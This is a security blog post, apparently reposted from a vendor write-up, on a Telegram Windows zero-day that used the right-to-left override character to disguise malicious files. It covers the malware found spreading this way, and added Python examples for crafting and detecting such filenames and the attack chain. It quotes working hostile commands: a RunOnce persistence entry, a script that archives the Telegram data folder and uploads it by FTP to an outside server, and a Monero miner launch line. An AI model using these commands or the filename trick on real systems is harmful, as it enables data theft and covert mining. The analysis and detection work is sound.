Zero-day vulnerability in Telegram
February 13, 2018 | Posted by BLOGGER under HACKER-TECH
In October 2017, we learned of a vulnerability in Telegram Messenger's Windows client that was being exploited in the wild. It involves the use of a classic right-to-left override attack when a user sends files over the messenger service.
Right-to-left override in a nutshell
The special nonprinting right-to-left override (RLO) character is used to reverse the order of the characters that come after it in a string. In the Unicode character table it is represented as 'U+202E'; one area of legitimate use is when typing Arabic text. In an attack, this character can be used to mislead the victim. It is typically abused where the name and extension of an executable file are displayed: a piece of software vulnerable to this kind of attack will show the filename incompletely or in reverse.
— Mikko Hypponen (@mikko), 15 July 2013
Launching an attack on Telegram
Below is an account of how this vulnerability was exploited in Telegram:
- The cybercriminal prepares the malware to be sent in a message. For example, a JS file is renamed as follows:
evil.js -> photo_high_re*U+202E*gnp.js
Here *U+202E* is the RLO character, which makes Telegram display the remaining string gnp.js in reverse, so the name is rendered as photo_high_resj.png. Note that this operation does not change the actual file – it still has the extension *.js.
- The attacker sends the message, and – surprise! – the recipient sees an incoming PNG image file instead of a JS file:
- When the user clicks on this file, the standard Windows security notification is displayed:
Importantly, this notification is only displayed if it hasn't been disabled in the system's settings. If the user clicks on 'Run', the malicious file is launched.
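The rename above can be reproduced and, more usefully, detected with a few lines of Python. The following is an added example and not code from the original post or from Telegram: it builds the attacker's filename from the pieces shown above, approximates how a renderer that honours U+202E displays it, and shows the check a client (or a mail/chat gateway) should apply, namely taking the extension from the raw string and refusing any name that carries a bidi control character. The function names and the simplified rendering rule are this example's own assumptions.

```python
import os
import unicodedata

# Unicode bidirectional control characters. U+202E (RLO) is the one used in the
# Telegram attack; the others can disguise a filename in the same way.
BIDI_CONTROLS = frozenset(
    "\u202a\u202b\u202c\u202d\u202e"  # LRE, RLE, PDF, LRO, RLO
    "\u2066\u2067\u2068\u2069"        # LRI, RLI, FSI, PDI
    "\u200e\u200f"                    # LRM, RLM
)
RLO, PDF = "\u202e", "\u202c"


def craft_rlo_name(prefix: str, real_ext: str, shown_ext: str) -> str:
    """Build the attacker's filename: the file keeps its real extension, and the
    tail after the RLO is written backwards so that it *renders* as shown_ext."""
    return f"{prefix}{RLO}{shown_ext[::-1]}.{real_ext}"


def render_naive(name: str) -> str:
    """Approximate what a renderer that honours RLO (with no isolation) shows:
    everything after the RLO is displayed in reverse order, up to a PDF.
    This is a simplification of the Unicode bidi algorithm (assumption of this
    example) that is accurate for plain ASCII filenames like the one above."""
    if RLO not in name:
        return name
    head, tail = name.split(RLO, 1)
    override, _, rest = tail.partition(PDF)
    return head + override[::-1] + rest


def true_extension(name: str) -> str:
    """The extension the OS actually uses: taken from the raw string, never from the rendering."""
    return os.path.splitext(name)[1].lower()


def sanitize(name: str) -> str:
    """Drop bidi control characters so the displayed name matches the real one."""
    return "".join(ch for ch in name if ch not in BIDI_CONTROLS)


def inspect_filename(name: str) -> dict:
    """Flag a filename that carries any bidi control character, or whose
    displayed extension differs from its real one."""
    controls = sorted({unicodedata.name(ch) for ch in name if ch in BIDI_CONTROLS})
    shown = render_naive(name)
    real_ext, shown_ext = true_extension(name), true_extension(shown)
    return {
        "displayed": shown,
        "real_extension": real_ext,
        "displayed_extension": shown_ext,
        "controls": controls,
        "suspicious": bool(controls) or real_ext != shown_ext,
    }


if __name__ == "__main__":
    attacker_name = craft_rlo_name("photo_high_re", "js", "png")
    print(repr(attacker_name))              # the raw string the client received
    print(inspect_filename(attacker_name))  # what a careful client should notice
```

The fix on the client side is the one inspect_filename implements: decide what the file is from the raw bytes, not from the rendered text, and either strip or refuse bidi controls in attachment names. Stripping alone is not enough if the download dialog still trusts the rendered extension.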
Exploitation in the wild
After learning about the vulnerability, we started to research cases in which it was actually exploited. These cases fall into several general scenarios.
Remote control
The aim of this kind of attack is to take control of the victim's system; it involves the attacker studying the target system's environment and installing additional modules.
At the first stage, a downloader written in .NET is delivered to the target. It uses the Telegram API as its command protocol:
With this token and API, it is easy to find the Telegram bot through which the infected systems are controlled:
When launched, it modifies a startup registry key to gain persistence on the system and copies its executable file into one of several directories, depending on the environment:
Then it begins to check every two seconds for commands coming back from the control bot. Note that the commands are implemented in Russian:
The list of supported commands shows that the bot can silently install arbitrary malicious tools like backdoors, loggers and other malware on the target system. A complete list of supported commands is given below:
- Send list of files in directory to control bot.
- Launch executable file using Process.Start().
- Check if tor process is running, download logg.zip, unpack it, delete the archive and launch its content.
- Download file into its own directory.
- Delete file from its own directory.
- Unpack archive in its own directory using specified password.
- Terminate specified process using process.Kill().
- Similar to 'Download' (see above), with different command parsing.
- Similar to 'Launch' (see above), with different command parsing.
- Similar to 'Delete' (see above), with different command parsing.
- Similar to 'Unpack' (see above), with different command parsing.
- Send a list of processes running on the target PC to control bot.
An analysis of these commands shows that this loader is most likely designed to download another piece of malware, probably a logger that will spy on the victim.
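Because the downloader polls the Telegram Bot API every two seconds, its traffic has a recognisable shape on a proxy: a stream of getUpdates requests to api.telegram.org, all carrying the same bot token in the URL path, from a host that is not running a bot. The following detection is an added example, not code from the original post or from the malware: it parses constructed proxy log lines, groups getUpdates polls by (client, token) and flags tight, regular polling. The log format, the host addresses and the bot tokens are all made up for the example.

```python
import re
import statistics
from collections import defaultdict
from datetime import datetime

# Constructed proxy log lines, not from the original post. Format:
# "<ISO time> <client> <method> <url>". The tokens are made up; real ones have the
# same "<bot id>:<secret>" shape and sit in the URL path exactly like this.
SAMPLE_LOG = """\
2017-10-20T10:00:00 10.0.0.7 GET https://api.telegram.org/bot123456789:AAF3kQ0exampleTOKENxyz/getUpdates?offset=1
2017-10-20T10:00:02 10.0.0.7 GET https://api.telegram.org/bot123456789:AAF3kQ0exampleTOKENxyz/getUpdates?offset=1
2017-10-20T10:00:04 10.0.0.7 GET https://api.telegram.org/bot123456789:AAF3kQ0exampleTOKENxyz/getUpdates?offset=1
2017-10-20T10:00:06 10.0.0.7 GET https://api.telegram.org/bot123456789:AAF3kQ0exampleTOKENxyz/getUpdates?offset=1
2017-10-20T10:00:08 10.0.0.7 POST https://api.telegram.org/bot123456789:AAF3kQ0exampleTOKENxyz/sendMessage
2017-10-20T10:00:01 10.0.0.9 GET https://api.telegram.org/bot987654321:BBexampleOtherTokenQQ/getUpdates
2017-10-20T10:30:01 10.0.0.9 GET https://api.telegram.org/bot987654321:BBexampleOtherTokenQQ/getUpdates
2017-10-20T11:00:01 10.0.0.9 GET https://api.telegram.org/bot987654321:BBexampleOtherTokenQQ/getUpdates
2017-10-20T10:00:03 10.0.0.12 GET https://web.telegram.org/
"""

LINE_RE = re.compile(r"^(\S+) (\S+) (\S+) (\S+)$")
# Bot API URLs embed the token in the path: /bot<id>:<secret>/<method>
BOT_RE = re.compile(r"https?://api\.telegram\.org/bot(\d+:[A-Za-z0-9_-]+)/(\w+)")


def parse_line(line):
    """Return the fields of one Bot API request, or None for anything else."""
    m = LINE_RE.match(line.strip())
    if not m:
        return None
    ts, client, method, url = m.groups()
    b = BOT_RE.search(url)
    if not b:
        return None
    return {"ts": datetime.fromisoformat(ts), "client": client,
            "token": b.group(1), "api_method": b.group(2)}


def mask_token(token):
    """Keep the bot id (it identifies the controller) but never log the full secret."""
    bot_id, _, secret = token.partition(":")
    return f"{bot_id}:{secret[:4]}..."


def find_beacons(log_text, max_median_interval=5.0, min_requests=3):
    """Group getUpdates polls by (client, token) and flag tight, regular polling."""
    polls = defaultdict(list)
    for line in log_text.splitlines():
        ev = parse_line(line)
        if ev and ev["api_method"] == "getUpdates":
            polls[(ev["client"], ev["token"])].append(ev["ts"])
    findings = []
    for (client, token), stamps in polls.items():
        if len(stamps) < min_requests:
            continue
        stamps.sort()
        gaps = [(b - a).total_seconds() for a, b in zip(stamps, stamps[1:])]
        median = statistics.median(gaps)
        if median <= max_median_interval:
            findings.append({"client": client, "bot": mask_token(token),
                             "requests": len(stamps), "median_interval_s": median})
    return findings


if __name__ == "__main__":
    for finding in find_beacons(SAMPLE_LOG):
        print(finding)
```

Two caveats a practitioner would want: a legitimate bot using long polling also issues regular getUpdates requests, so the cadence alone is a lead, not a verdict; correlate it with the process that made the request and with whether that host has any business running a bot. And the bot id that survives masking is the pivot the post describes: with the token in hand, the controlling bot can be identified directly.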
Miners and more
Amid the cryptocurrency boom, cybercriminals are increasingly moving away from 'classic theft' to a new way of making money from their victims, namely mining cryptocurrency using the resources of an infected computer. All they need to do is run a mining client on the victim's computer and specify the details of their cryptocurrency wallet.
At the first stage of the attack, an SFX archive with a script is used that launches an executable file:
This run.exe file is actually a BAT file. The batch script, after extraction, looks like this:
As we can see, the malicious program first opens a decoy file – in this case an image – to lull the victim into a false sense of security.
Then two miners start one after the other. They are launched as services with the help of the nssm.exe utility, which is also contained in the same SFX archive.
- nheq.exe: an Equihash miner for NiceHash (in this particular case, it mined Zcash). It can use the resources of both the CPU and the graphics accelerator:
- taskmgn.exe: another popular miner implementing the CryptoNight algorithm. It mines Fantomcoin and Monero. There is a known specific string with a PDB path:
We have seen several versions of this batch script, some of which have additional features:
This particular version disables Windows security features, then logs on to a malicious FTP server, downloads a payload and launches it. In this case, the payload was an SFX archive containing more miners and a Remote Manipulator System (RMS) client, an analog of TeamViewer. Using AutoIt scripts, the malware deploys RMS on the targeted computer for subsequent remote access:
The attack flowchart is approximately as follows:
We examined this FTP server and found several more similar payloads, which are probably loaded by other versions of this malware.
The file address4.exe deserves a separate mention. Like the other files, it is an SFX archive with the following contents:
All components named st*.exe are executable PE files converted from batch scripts in the same way.
The SFX script launches the component st1.exe:
st1.exe adds st2.exe to the system startup by writing the appropriate value to the registry:
reg add HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce /v RUN1 /d %temp%\adress\st2.exe /f
So the st2.exe file launches the next time the system is booted:
TIMEOUT /T 10 /NOBREAK #Waits for Telegram to start
taskkill /IM telegram.exe #Terminates Telegram processes
cd %temp%\sss #Changes into the temporary directory
"%temp%\adress\WinRAR.exe" A -ibck -inul -r -agYY-mm-dd-hh-mm-ss "%temp%\sss\1.rar" "%appdata%\Telegram Desktop" #Packs the Telegram directory into a RAR archive
TIMEOUT /T 60 /NOBREAK
ping -n 1 ya.ru |>nul find /i "TTL=" && (start "" %temp%/adress/st3.exe) || (ping 127.1 -n 2& Goto :start) #Checks Internet connection and launches st3.exe
As expected, st3.exe logs on to the malicious FTP server and uploads the RAR archive that was created earlier:
@echo XXXXXXXX>command.txt
@echo XXXXXXXX>>command.txt
@echo binary>>command.txt
@echo mput %temp%\sss\*.rar>>command.txt
@echo quit>>command.txt
ftp -s:command.txt -i free11.receive.com
del command.txt
attrib %temp%/adress +H
attrib %temp%/adress\* +H
On that FTP server, we found several archives of this kind containing Telegram directories stolen from the victims:
Each dump contains, in addition to the Telegram client's executables and utility files, an encrypted local cache holding the various files used in personal communications: documents, video and audio files and images.
Just like in the previous scenario, an attack begins with an SFX archive opening and launching a VBScript that it contains. Its main job is to open a decoy image to distract the user, and then to download and launch the payload:
The payload is an SFX archive with the following script:
svchost.vbs is a script controlling the launch of the CryptoNight miner (csrs.exe). It monitors the task list; if it detects a task manager (taskmgr.exe, processhacker.exe) on that list, it terminates the miner's process and re-launches it when the task manager is closed.
The script contains the appropriate comments:
The miner itself is launched as follows:
WshShell.Run "csrs.exe -a cryptonight -o stratum+tcp://xmr.pool.minergate.com:45560 -u XXXXXXXXX@yandex.ru -p x -dbg -1" & cores, 0
The pool address is associated with the cryptocurrency Monero.
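The st1/st2/st3 chain above (RunOnce persistence, killing telegram.exe, archiving the "Telegram Desktop" directory, a scripted ftp upload) and the miner launch line just shown are all visible in process-creation telemetry, and the components hide under names borrowed from Windows (csrs.exe, svchost.vbs, taskmgn.exe) while running out of %temp%. The following is an added example, not code from the original post or from the malware: it runs a handful of command-line rules over constructed process-creation events, flags system-looking names outside the Windows directory, pulls the pool and login out of a miner command line, and only reports a host once it has hit two or more distinct steps of the chain. The event format, host names, paths and the FTP address (a TEST-NET IP) are this example's own assumptions.

```python
import re
from collections import defaultdict

# Constructed process-creation events, not from the original post.
# Format: "<ISO time>|<host>|<image path>|<command line>". Hosts, paths and the
# FTP address are made up; the command lines mirror the ones quoted above.
SAMPLE_EVENTS = r"""
2017-11-03T09:12:01|PC-17|C:\Windows\System32\reg.exe|reg add HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce /v RUN1 /d %temp%\adress\st2.exe /f
2017-11-03T09:15:22|PC-17|C:\Windows\System32\taskkill.exe|taskkill /IM telegram.exe
2017-11-03T09:15:23|PC-17|C:\Users\u\AppData\Local\Temp\adress\WinRAR.exe|"C:\Users\u\AppData\Local\Temp\adress\WinRAR.exe" A -ibck -inul -r "C:\Users\u\AppData\Local\Temp\sss\1.rar" "C:\Users\u\AppData\Roaming\Telegram Desktop"
2017-11-03T09:16:30|PC-17|C:\Windows\System32\ftp.exe|ftp -s:command.txt -i 203.0.113.5
2017-11-03T09:20:00|PC-17|C:\Users\u\AppData\Local\Temp\csrs.exe|csrs.exe -a cryptonight -o stratum+tcp://xmr.pool.minergate.com:45560 -u XXXXXXXXX@yandex.ru -p x -dbg -1
2017-11-03T09:21:00|PC-42|C:\Windows\System32\svchost.exe|svchost.exe -k netsvcs
2017-11-03T09:22:00|PC-42|C:\Program Files\WinRAR\WinRAR.exe|"C:\Program Files\WinRAR\WinRAR.exe" a report.rar report.docx
"""

# Each rule is one step of the chain described in the post.
RULES = {
    "runonce_persistence":   re.compile(r"\breg(?:\.exe)?\s+add\b.*\\CurrentVersion\\Run(?:Once)?\b", re.I),
    "telegram_killed":       re.compile(r"\btaskkill\b.*\btelegram\.exe\b", re.I),
    "telegram_dir_archived": re.compile(r"\b(?:winrar|rar|7z)(?:\.exe)?\b.*\bTelegram Desktop\b", re.I),
    "ftp_scripted_upload":   re.compile(r"\bftp(?:\.exe)?\b.*\s-s:", re.I),
    "cryptominer_cmdline":   re.compile(r"stratum\+tcp://|\s-a\s+cryptonight\b", re.I),
}
# Names the samples borrowed from Windows components are only legitimate when the
# image actually lives under the Windows directory (an assumption of this example).
SYSTEM_LOOKALIKES = {"svchost", "csrs", "csrss", "taskmgn", "taskmgr"}
MINER_OPTS = re.compile(r"-o\s+(\S+).*?-u\s+(\S+)")


def parse_event(line):
    parts = line.strip().split("|", 3)
    if len(parts) != 4:
        return None
    ts, host, image, cmdline = parts
    return {"ts": ts, "host": host, "image": image, "cmdline": cmdline}


def match_rules(ev):
    """Names of every rule this one event satisfies."""
    hits = [name for name, rx in RULES.items() if rx.search(ev["cmdline"])]
    stem = ev["image"].rsplit("\\", 1)[-1].rsplit(".", 1)[0].lower()
    if stem in SYSTEM_LOOKALIKES and not ev["image"].lower().startswith("c:\\windows\\"):
        hits.append("system_name_outside_windows")
    return hits


def miner_details(cmdline):
    """Pool and login from a cryptonight-style command line, for pivoting."""
    m = MINER_OPTS.search(cmdline)
    return {"pool": m.group(1), "login": m.group(2)} if m else None


def analyse(events_text, min_rules=2):
    """Hosts that hit at least `min_rules` distinct chain steps, with miner details."""
    per_host = defaultdict(lambda: {"rules": set(), "miner": None})
    for line in events_text.splitlines():
        ev = parse_event(line)
        if not ev:
            continue
        hits = match_rules(ev)
        per_host[ev["host"]]["rules"].update(hits)
        if "cryptominer_cmdline" in hits:
            per_host[ev["host"]]["miner"] = miner_details(ev["cmdline"])
    return {h: {"rules": sorted(d["rules"]), "miner": d["miner"]}
            for h, d in per_host.items() if len(d["rules"]) >= min_rules}


if __name__ == "__main__":
    for host, verdict in analyse(SAMPLE_EVENTS).items():
        print(host, verdict)
```

WinRAR and ftp.exe both have legitimate uses, which is why the verdict requires several distinct steps on the same host rather than any single rule; the archive rule keys on the "Telegram Desktop" path specifically because that directory, with its encrypted local cache, is what the st2.exe stage packs and uploads.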
On the server itself, in addition to the payload files mentioned above, we found similar SFX archives with miners:
It appears that only Russian cybercriminals were aware of this vulnerability, with all the exploitation cases that we detected taking place in Russia. Also, while conducting detailed research into these attacks we found a number of artifacts that pointed to involvement by Russian cybercriminals.
We don't have exact information about for how long, or which versions of, the Telegram products were affected by the vulnerability. What we do know is that its exploitation in Windows clients began in March 2017. We informed the Telegram developers of the problem, and the vulnerability no longer occurs in Telegram's products.
This paper presents only those cases that were reported by Kaspersky Lab's telemetry systems. The full scope and other methods of exploitation remain unknown.